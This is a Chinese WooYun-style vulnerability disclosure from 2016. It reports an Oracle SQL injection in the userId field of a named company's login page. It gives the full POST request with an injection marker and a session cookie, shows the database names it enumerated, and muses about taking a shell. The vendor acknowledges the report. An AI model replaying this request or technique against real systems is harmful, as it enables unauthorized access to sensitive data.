乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-28: 细节已通知厂商并且等待厂商处理中 2016-01-28: 厂商已经确认,细节仅向厂商公开 2016-02-07: 细节向核心白帽子及相关领域专家公开 2016-02-17: 细节向普通白帽子公开 2016-02-27: 细节向实习白帽子公开 2016-03-10: 细节向公众公开
这个漏洞绝对是最高危了,敏感系统,oracle SQL注入。求赏20rank求上首页
漏洞地址:http://fs.foton.com.cn/login.do
登录处用户名字段未过滤,导致SQL注入:
测试代码:
POST /login.do HTTP/1.1Host: fs.foton.com.cnProxy-Connection: keep-aliveContent-Length: 87Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://fs.foton.com.cnUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://fs.foton.com.cn/login.doAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=T4b2Wp6G1xQWs1s53GHPDPX0WsldxgQSvv7RFBZMGvw4Bv6TnyQR!-679489738; Hm_lvt_c6855a4f92c19d51a6c4fdcb09a22262=1453961208; Hm_lpvt_c6855a4f92c19d51a6c4fdcb09a22262=1453961289accountSet=1&localeSet=zh_CN&isChange=&userId=admin*&password=admin&loginDate=2016-01-28
缺陷参数:userId查看权限:
查看数据库:
available databases [19]:[*] BQFT[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] FTQCJR[*] FTQCJRTEST[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PATROL[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
进系统?获取敏感数据?拿shell。我想这个可以做到吧。
查看权限:
1.过滤userId2.上WAF3.求给20rank
危害等级:高
漏洞Rank:20
确认时间:2016-01-28 15:57
感谢提交漏洞,已经通知管理员进行过滤,谢谢
暂无